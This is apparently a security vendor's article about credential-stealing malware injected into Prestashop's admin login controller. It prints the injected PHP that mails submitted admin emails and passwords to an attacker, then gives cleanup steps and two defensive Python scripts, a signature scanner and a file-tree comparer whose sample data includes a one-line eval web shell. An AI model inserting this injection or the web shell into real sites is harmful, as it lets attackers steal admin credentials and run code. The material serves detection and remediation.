As a growing e-commerce platform, Prestashop is a large target for attackers who want to steal data. The data targeted is usually credit card numbers, but our researchers have recently found a new kind of credential-stealing malware that targets Prestashop sites and harvests the site admin's login credentials. This can lead to the complete takeover of your website.
How the Prestashop Credential Stealing Malware Works
The Prestashop credential stealing malware was found injected into the file
./controllers/admin/AdminLoginController.php on infected Prestashop sites, like this:
public function processLogin()
{
    /* Check fields validity */
    $passwd = trim(Tools::getValue('passwd'));
    $email = trim(Tools::getValue('email'));

    // --- injected code starts here: the submitted credentials are mailed out ---
    $to = "[email protected]";                                   // recipient address redacted in this listing
    $subject = "panel admin prestashop " . $_SERVER['SERVER_NAME'];
    $header = "from: hacked <[email protected]>";
    $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
    $message .= "Path : " . __file__;                            // __file__ is PHP's (case-insensitive) __FILE__ constant: the infected file's own path
    $sentmail = @mail($to, $subject, $message, $header);         // @ suppresses any error mail() would raise
    $sentmail1 = @mail($to, $subject, $message, $header);        // the same message is sent a second time
    // --- injected code ends; the original login handling of the method follows ---
This code sits at the very start of the login handler, where the controller reads the submitted form fields into variables. The injected part reuses the $email and $passwd variables, which hold the username and password typed into the Prestashop back-office login form, builds an email containing them together with the site's URL and the path of the infected file, and sends it to the attacker's address with the PHP mail() function. Because it runs before the credentials are validated, every login attempt is exfiltrated, whether or not it succeeds; the @ operator hides any mail() error from the logs, and the message is sent twice, apparently to improve the odds of delivery.
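The injected snippet above leaves two things a scanner can key on: the attacker's own strings, and a mail() call sitting next to the code that reads the login password, which a stock login controller has no reason to do. The following scanner is an added example, not the article's own tooling or anything from Prestashop: it walks a Prestashop install, checks every PHP file for both signatures, and reports file, line and the indicator that matched. The sample files it scans are constructed in a temporary directory so the script runs offline; the example addresses in them are placeholders.

```python
"""Scan a Prestashop install for the injected credential-exfiltration code.

Added example, not code from the original article. It looks for the two
things the injected snippet cannot avoid: the attacker's literal strings and
a PHP mail() call in a file that also reads the submitted login password.
"""
import re
import tempfile
from pathlib import Path

# Strings lifted from the injected code shown in the article.
KNOWN_STRINGS = (
    "panel admin prestashop",
    "&up=hous",
    "bajatax",
    "sniper :v",
)

# A mail() call (optionally with the @ error-suppression operator) in a file
# that also reads the login password is the generic signature of this family;
# it catches re-packaged variants that change the strings above.
MAIL_CALL = re.compile(r"@?\bmail\s*\(", re.IGNORECASE)
READS_PASSWD = re.compile(r"Tools::getValue\(\s*['\"]passwd['\"]\s*\)")


def scan_php_source(source: str, relpath: str = "<memory>") -> list[dict]:
    """Return one finding per matching line: {"file", "line", "indicator"}."""
    findings = []
    reads_password = bool(READS_PASSWD.search(source))
    for lineno, line in enumerate(source.splitlines(), start=1):
        lowered = line.lower()
        for s in KNOWN_STRINGS:
            if s in lowered:
                findings.append({"file": relpath, "line": lineno, "indicator": f"string:{s}"})
        if reads_password and MAIL_CALL.search(line):
            findings.append({"file": relpath, "line": lineno,
                             "indicator": "mail() beside password handling"})
    return findings


def scan_tree(root: Path) -> list[dict]:
    """Scan every .php file under root (assumed to be the Prestashop install directory)."""
    findings = []
    for path in sorted(root.rglob("*.php")):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        findings.extend(scan_php_source(text, path.relative_to(root).as_posix()))
    return findings


# Constructed sample: a cut-down AdminLoginController.php carrying the injection,
# and a clean controller, written to a temp dir so the example runs offline.
INFECTED_SAMPLE = """<?php
class AdminLoginControllerCore extends AdminController
{
    public function processLogin()
    {
        $passwd = trim(Tools::getValue('passwd'));
        $email = trim(Tools::getValue('email'));
        $to = "attacker@example.invalid";
        $subject = "panel admin prestashop " . $_SERVER['SERVER_NAME'];
        $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "&up=hous \\r\\n email: $email \\r\\n pass: $passwd \\r\\n by bajatax -- sniper :v \\r\\n";
        $sentmail = @mail($to, $subject, $message, "from: hacked <x@example.invalid>");
    }
}
"""
CLEAN_SAMPLE = """<?php
class AdminLoginControllerCore extends AdminController
{
    public function processLogin()
    {
        $passwd = trim(Tools::getValue('passwd'));
        $email = trim(Tools::getValue('email'));
        $this->context->employee = new Employee();
    }
}
"""


def demo() -> list[dict]:
    """Build the two sample files in a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        admin = root / "controllers" / "admin"
        admin.mkdir(parents=True)
        (admin / "AdminLoginController.php").write_text(INFECTED_SAMPLE)
        (admin / "AdminStatusesController.php").write_text(CLEAN_SAMPLE)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}:{f['line']}: {f['indicator']}")
```

Run it against the document root of a real install by calling scan_tree(Path("/var/www/prestashop")) or whatever your path is. The string indicators will disappear as soon as the attacker edits the message, which is why the second rule, mail() in the same file as Tools::getValue('passwd'), is the one worth keeping in a permanent check; on a clean install it should never fire.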
The email gives the attacker everything needed to log into the back-office of the hacked Prestashop site with full administrative access. From there they can change the content, install fake or infected modules, and do a whole lot more.
In some cases, victims of this hack began receiving bounce-back emails, most likely because Google detected the abuse and disabled or reported the accounts involved.
The attacker or hacking group running this malware campaign is believed to go by the name bajatx / B4JAT4T.
How to Fix Your Site After a Prestashop Credential Stealing Malware Infection
1. Take a backup of your site before cleaning.
It's advisable to take the website offline so that users don't hit the infected pages while you're cleaning it. Back up all the core files and the database first, and keep the backup in a compressed archive such as a .zip file; you will need it both for comparison and as a record of the infected state.
2. Replace the core, module (plugin), and theme files.
Download fresh copies of the same Prestashop version, modules and theme from their official sources, then replace the existing files and directories with them and delete the old ones. This step matters especially for the Prestashop credential stealing malware, because the malicious code was found inside a core file rather than in a module or theme.
3. Clean any suspicious, recently modified files.
Sorting the files on the server by modification time points you at likely candidates; restore each one from a clean backup or from a trusted source. Treat this as a hint rather than a proof: an attacker can reset a file's timestamp, so a file that does not show up as recently modified is not automatically clean.
4. Run a malware scan.
Scan the web server for remaining malware and malicious files. You can use the 'Virus Scanner' tool in the cPanel provided by your web host, or get expert malware cleanup with the Astra Pro Plan, which blocks the attack and also the bots which try to download the stolen data. Once the site is clean, change the password of every back-office account, since the credentials used while the site was infected were sent to the attacker.
In addition to these steps, you may find this article on Prestashop security helpful.
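Steps 2 and 3 above amount to one question: which files on the live server differ from a pristine copy of the same Prestashop version, and which were touched recently? The script below is an added example, not part of the article or of Prestashop itself. It hashes both trees, reports files whose content differs, files that exist only on the live server (droppers and web shells usually do), files missing from the live copy, and files modified within the last N days. Configuration files that legitimately differ per site are skipped for the hash comparison, and PHP files inside media directories are always reported, because nothing there should be executable. The list of site-specific paths is an assumption to adjust for your install; the two sample trees are constructed in temporary directories so the example runs offline.

```python
"""Compare a live Prestashop tree against a pristine copy of the same version.

Added example, not code from the original article. Constructed sample trees
are built in temp dirs; point compare_trees() at real directories in practice.
"""
import hashlib
import os
import tempfile
import time
from pathlib import Path

# Assumed lists: per-site configuration that always differs from a fresh
# download, and media directories that must never contain PHP.
CONFIG_FILES = {"config/settings.inc.php", "app/config/parameters.php"}
CONTENT_DIRS = ("img/", "upload/", "download/")


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root: Path) -> dict[str, str]:
    """Map POSIX-style relative path -> sha256 for every regular file under root."""
    return {p.relative_to(root).as_posix(): sha256_of(p) for p in root.rglob("*") if p.is_file()}


def compare_trees(pristine: Path, live: Path, recent_days: int = 7, now=None) -> dict[str, list[str]]:
    """Classify live files as modified, added, missing or recent (mtime within recent_days)."""
    now = time.time() if now is None else now
    cutoff = now - recent_days * 86400
    ref, cur = hash_tree(pristine), hash_tree(live)
    report = {"modified": [], "added": [], "missing": [], "recent": []}
    for rel, digest in sorted(cur.items()):
        if rel in CONFIG_FILES:
            pass                                   # expected to differ from the download
        elif rel.startswith(CONTENT_DIRS):
            if rel.endswith(".php"):               # PHP has no business in a media directory
                report["added"].append(rel)
        elif rel not in ref:
            report["added"].append(rel)
        elif ref[rel] != digest:
            report["modified"].append(rel)
        if (live / rel).stat().st_mtime >= cutoff:
            report["recent"].append(rel)
    report["missing"] = sorted(rel for rel in ref
                               if rel not in cur and rel not in CONFIG_FILES
                               and not rel.startswith(CONTENT_DIRS))
    return report


def _write(root: Path, rel: str, text: str, mtime: float) -> None:
    p = root / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_text(text)
    os.utime(p, (mtime, mtime))


def demo() -> dict[str, list[str]]:
    """Constructed sample: the live copy has the injected controller, a dropped
    PHP file under img/, a customised config file, and one deleted core file."""
    now = time.time()
    month_ago = now - 30 * 86400
    with tempfile.TemporaryDirectory() as a, tempfile.TemporaryDirectory() as b:
        pristine, live = Path(a), Path(b)
        for root in (pristine, live):
            _write(root, "index.php", "<?php require 'init.php';", month_ago)
            _write(root, "classes/Tools.php", "<?php class Tools {}", month_ago)
        _write(pristine, "controllers/admin/AdminLoginController.php", "<?php // clean", month_ago)
        _write(live, "controllers/admin/AdminLoginController.php", "<?php @mail($to, ...);", now)
        _write(pristine, "config/settings.inc.php", "<?php define('_DB_NAME_', '');", month_ago)
        _write(live, "config/settings.inc.php", "<?php define('_DB_NAME_', 'shop');", month_ago)
        _write(pristine, "js/admin.js", "// admin js", month_ago)
        _write(live, "img/cache.php", "<?php eval($_POST['c']);", now)
        return compare_trees(pristine, live, recent_days=7, now=now)


if __name__ == "__main__":
    for category, files in demo().items():
        print(category, files)
```

Everything in "modified" and "added" is what step 2 will overwrite or what you must delete by hand; "missing" tells you which core files the attacker removed; "recent" is the step 3 list, subject to the timestamp caveat above. Take the pristine copy from the official download for your exact version, not from another site you administer, or you risk comparing one infected copy against another.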
How to Prevent Further Attacks
After fixing your site, here are a few security practices which help keep it safe from Prestashop credential stealing malware:
- Keep Prestashop itself, its modules and its theme on the latest release
- Use trusted third-party payment processors
- Perform regular malware scans/security audits
- Put a website firewall in front of the site
The only sure-fire way to protect your website against attackers' ever-evolving methods is to invest in security: a website firewall, frequent malware scans, and regular security audits together give you a clear picture of your website's overall security.